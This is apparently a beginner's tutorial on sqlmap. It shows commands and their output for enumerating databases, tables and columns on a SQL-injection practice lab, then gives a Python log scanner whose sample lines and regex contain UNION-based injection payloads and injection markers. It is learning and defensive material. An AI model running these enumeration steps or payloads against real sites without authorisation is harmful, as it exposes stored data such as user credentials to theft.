A noob's road into security
Not going to say much about setting up the environment, there is plenty about it online. I'm a noob and it took me over a week; it really isn't hard, I was just being a pain.
Start with the most basic command: sqlmap -h
[pretend there is an image here] There are too many parameters and the screenshot is a bit long, so I'll leave it out.
Take a rough look at the individual parameters.
sqlmap -hh gives the complete help documentation.
The commonly used parameters are the following:
1. sqlmap -u <url>
Test whether a URL is injectable.
The URL here means a URL that carries request parameters and may have an injection flaw, for example http://sqli.snowing.com/Less-1/?id=1
sqlmap -u http://sqli.snowing.com/Less-1/?id=1
The conclusion it produced, verbatim:
[22:06:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
1. Server operating system: Linux Ubuntu 16.04 (xenial)
2. Web server application: Apache 2.4.18
3. Database information: MySQL >= 5.0
2. sqlmap -r <request_info_file>
Test whether the request stored in a text file is injectable.
The file contains the request part of an HTTP request, roughly like this:
GET /Less-1/?id=1 HTTP/1.1
Host: sqli.snowing.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
For example, if this information is saved in a file named req_info.txt, run sqlmap -r req_info.txt
to test whether the request in the file is injectable.
The -r parameter is usually used when there is cookie injection, so you don't have to set cookie, post and other parameters separately.
3. sqlmap -u <url> --dbs
List all databases visible to the current user.
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 --dbs
The conclusion it produced, verbatim:
[23:44:26] [INFO] fetching database names
[23:44:26] [WARNING] the SQL query provided does not return any output
[23:44:26] [INFO] used SQL query returns 8 entries
[23:44:26] [INFO] resumed: information_schema
[23:44:26] [INFO] resumed: challenges
[23:44:26] [INFO] resumed: dvwa
[23:44:26] [INFO] resumed: mysql
[23:44:26] [INFO] resumed: performance_schema
[23:44:26] [INFO] resumed: phpmyadmin
[23:44:26] [INFO] resumed: security
[23:44:26] [INFO] resumed: sys
available databases [8]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] sys
The test returns the names of all databases visible to the current user:
available databases [8]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] sys
4. sqlmap -u <url> -D <database> --tables
Get the table names in a specified database.
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 -D security --tables
The conclusion it produced, verbatim:
[00:02:18] [INFO] fetching tables for database: 'security'
[00:02:18] [WARNING] the SQL query provided does not return any output
[00:02:18] [INFO] used SQL query returns 4 entries
[00:02:18] [INFO] resumed: emails
[00:02:18] [INFO] resumed: referers
[00:02:18] [INFO] resumed: uagents
[00:02:18] [INFO] resumed: users
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
We get the following table names:
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
5. sqlmap -u <url> -D <database> -T <table> --columns
Get the column names of a table.
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 -D security -T users --columns
The test above returned the column names of the users table and their types:
[16:35:24] [INFO] fetching columns for table 'users' in database 'security'
[16:35:24] [WARNING] the SQL query provided does not return any output
[16:35:24] [INFO] used SQL query returns 3 entries
[16:35:24] [INFO] retrieved: id
[16:35:24] [INFO] retrieved: int(3)
[16:35:24] [INFO] retrieved: username
[16:35:24] [INFO] retrieved: varchar(20)
[16:35:24] [INFO] retrieved: password
[16:35:24] [INFO] retrieved: varchar(20)
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
6. sqlmap -u <url> --current-db
Get the name of the database the site is currently using.
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 --current-db
[16:45:03] [INFO] fetching current database
[16:45:03] [INFO] retrieved: security
current database: 'security'
You can see that the site's current database is named security.
Full sqlmap parameter reference
sqlmap -hh
Lists all parameters; here is a copied reference.
>-< Noob looking for a master to guide me…
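Since the lab target above is Apache in front of MySQL, here is the defender's side of the same exercise, as an added example of my own and not code from the original post or from sqlmap: a small Python script that scans Apache combined-format access-log lines for the kind of probing that the runs above send to the Less-1 id parameter, and counts flagged requests per client IP. The log lines are constructed samples, and the sqlmap version string in one user-agent is a placeholder.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache access-log lines modelled on the lab page used above
# (/Less-1/ with its "id" parameter); they are sample data, not a real capture.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:22:06:01 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.0.0.5 - - [01/Jan/2020:22:06:02 +0000] "GET /Less-1/?id=1%27 HTTP/1.1" 200 480 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.0.0.5 - - [01/Jan/2020:22:06:03 +0000] "GET /Less-1/?id=1%27%20AND%201%3D1%20AND%20%27a%27%3D%27a HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.0.0.5 - - [01/Jan/2020:22:06:04 +0000] "GET /Less-1/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- HTTP/1.1" 200 600 "-" "sqlmap/1.3 (http://sqlmap.org)"
10.0.0.9 - - [01/Jan/2020:22:07:00 +0000] "GET /Less-1/?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0"
"""

# Combined-log format: client IP, method, path (with query), status, user agent.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Typical injection markers in a decoded parameter value: quote characters,
# SQL comment openers, UNION/SELECT, time-based functions and tautologies.
MARKER_RE = re.compile(
    r"""('|"|--|/\*|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|\b(?:and|or)\s+\d+\s*=\s*\d+)""",
    re.IGNORECASE,
)

def suspicious_reasons(path, user_agent):
    """Return the list of reasons a request looks like SQL injection probing."""
    reasons = []
    # sqlmap's default User-Agent names itself; the -r file above overrides it,
    # so treat this as a weak signal that only helps when it is present.
    if "sqlmap" in user_agent.lower():
        reasons.append("user-agent:sqlmap")
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        hit = MARKER_RE.search(value)  # value is already URL-decoded here
        if hit:
            reasons.append(f"param:{name}:{hit.group(0)}")
    return reasons

def analyse(log_text):
    """Count flagged requests per client IP over Apache combined-log text."""
    flagged = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _method, path, _status, agent = m.groups()
        if suspicious_reasons(path, agent):
            flagged[ip] += 1
    return flagged

if __name__ == "__main__":
    for ip, count in analyse(SAMPLE_LOG).most_common():
        print(f"{ip}: {count} suspicious request(s)")
```

A single flagged request is usually just a curious user; the repeated variations of one parameter from one IP within seconds are what distinguish an automated scan.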